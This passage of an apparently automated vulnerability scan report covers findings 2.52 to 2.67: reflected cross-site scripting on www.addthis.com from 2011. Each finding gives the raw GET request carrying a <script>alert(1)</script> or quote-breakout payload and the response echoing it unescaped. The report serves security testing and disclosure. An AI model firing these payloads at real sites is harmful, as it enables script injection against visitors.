<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>icons1659a<script>alert(1)</script>e062ce7c1b3/blank.gif</strong>
...[SNIP]...

2.52. http://www.addthis.com/icons/blank.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/icons/blank.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e1a2"-alert(1)-"845368caf11 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /icons/blank.gif1e1a2"-alert(1)-"845368caf11 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=mol0j8k3lb38niats80a12icm6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/icons/blank.gif1e1a2"-alert(1)-"845368caf11";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","False",2);
gaPageTrac
...[SNIP]...

2.53. http://www.addthis.com/icons/blank.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/icons/blank.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload eb09e<script>alert(1)</script>d8aaaa48cb4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /icons/blank.gifeb09e<script>alert(1)</script>d8aaaa48cb4 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=vppqeuo5uuekpros9n6u8p2dt0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1384

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>icons/blank.gifeb09e<script>alert(1)</script>d8aaaa48cb4</strong>
...[SNIP]...

2.54. http://www.addthis.com/icons/blank.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/icons/blank.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e11b9<script>alert(1)</script>fd09d67918b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /icons/blank.gif?e11b9<script>alert(1)</script>fd09d67918b=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=tl7l10eppcj969t4cb1hv33lk7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>icons/blank.gif?e11b9<script>alert(1)</script>fd09d67918b=1</strong>
...[SNIP]...

2.55. http://www.addthis.com/icons/folder.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/icons/folder.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3326"-alert(1)-"12918696245 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /iconsb3326"-alert(1)-"12918696245/folder.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=1movqvre3bvucvpfh2fr8l6c70; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/iconsb3326"-alert(1)-"12918696245/folder.gif";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","False",2);

...[SNIP]...

2.56. http://www.addthis.com/icons/folder.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/icons/folder.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 56e46<script>alert(1)</script>a6c7996c5fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /icons56e46<script>alert(1)</script>a6c7996c5fa/folder.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=086at6n4bc23937ife5s5btni3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1386

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>icons56e46<script>alert(1)</script>a6c7996c5fa/folder.gif</strong>
...[SNIP]...

2.57. http://www.addthis.com/icons/folder.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/icons/folder.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6458e"-alert(1)-"26a9e6990bf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /icons/folder.gif6458e"-alert(1)-"26a9e6990bf HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=aocb2mg7js7r9reo36b6ambla7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/icons/folder.gif6458e"-alert(1)-"26a9e6990bf";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","False",2);
gaPageTrac
...[SNIP]...

2.58. http://www.addthis.com/icons/folder.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/icons/folder.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 98af0<script>alert(1)</script>b3830461f7b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /icons/folder.gif98af0<script>alert(1)</script>b3830461f7b HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=ojaa9q5j9h34d16l65shigota3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1386

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>icons/folder.gif98af0<script>alert(1)</script>b3830461f7b</strong>
...[SNIP]...

2.59. http://www.addthis.com/icons/folder.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/icons/folder.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5a5d8<script>alert(1)</script>97309174cb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /icons/folder.gif?5a5d8<script>alert(1)</script>97309174cb8=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=53ufci60lm7uehup3kf4rdich0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>icons/folder.gif?5a5d8<script>alert(1)</script>97309174cb8=1</strong>
...[SNIP]...

2.60. http://www.addthis.com/icons/text.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/icons/text.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4f439<script>alert(1)</script>a7a2c9a43f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /icons4f439<script>alert(1)</script>a7a2c9a43f3/text.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=29rlq3k4b3mcgamv6ua3iaor60; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1382

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>icons4f439<script>alert(1)</script>a7a2c9a43f3/text.gif</strong>
...[SNIP]...

2.61. http://www.addthis.com/icons/text.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/icons/text.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 599da"-alert(1)-"fce4f2c1739 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /icons599da"-alert(1)-"fce4f2c1739/text.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=4tdn95mi3cij9lnbue2jab87v3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/icons599da"-alert(1)-"fce4f2c1739/text.gif";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","False",2);
g
...[SNIP]...

2.62. http://www.addthis.com/icons/text.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/icons/text.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77038"-alert(1)-"0135148c694 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /icons/text.gif77038"-alert(1)-"0135148c694 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=bhifhln6tmu7biulq77k503191; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/icons/text.gif77038"-alert(1)-"0135148c694";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","False",2);
gaPageTrac
...[SNIP]...

2.63. http://www.addthis.com/icons/text.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/icons/text.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f63cc<script>alert(1)</script>923ffd7a3fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /icons/text.giff63cc<script>alert(1)</script>923ffd7a3fd HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=pq4t9gola5mcttenu84s90pc85; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1382

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>icons/text.giff63cc<script>alert(1)</script>923ffd7a3fd</strong>
...[SNIP]...

2.64. http://www.addthis.com/icons/text.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/icons/text.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 81c87<script>alert(1)</script>26bf4aafb43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /icons/text.gif?81c87<script>alert(1)</script>26bf4aafb43=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=1g7s1tq22il1s5kgd5ldq8jur3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>icons/text.gif?81c87<script>alert(1)</script>26bf4aafb43=1</strong>
...[SNIP]...

2.65. http://www.addthis.com/images4/internet_explorer/borderBottomCenter.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderBottomCenter.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd41f"-alert(1)-"6b9950303c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images4bd41f"-alert(1)-"6b9950303c7/internet_explorer/borderBottomCenter.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=c8att98s0fi7v4ud8r9ifdjf92; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1424

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/images4bd41f"-alert(1)-"6b9950303c7/internet_explorer/borderBottomCenter.png";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCusto
...[SNIP]...

2.66. http://www.addthis.com/images4/internet_explorer/borderBottomCenter.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderBottomCenter.png

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ac05<script>alert(1)</script>3903bcf2fb8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images42ac05<script>alert(1)</script>3903bcf2fb8/internet_explorer/borderBottomCenter.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=js6skcjqk1auj92jj5orfnlmo4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1450

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>images42ac05<script>alert(1)</script>3903bcf2fb8/internet_explorer/borderBottomCenter.png</strong>
...[SNIP]...

2.67. http://www.addthis.com/images4/internet_explorer/borderBottomCenter.png [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderBottomCenter.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5f3c"-alert(1)-"7b34116a1a8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images4/internet_explorerd5f3c"-alert(1)-"7b34116a1a8/borderBottomCenter.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
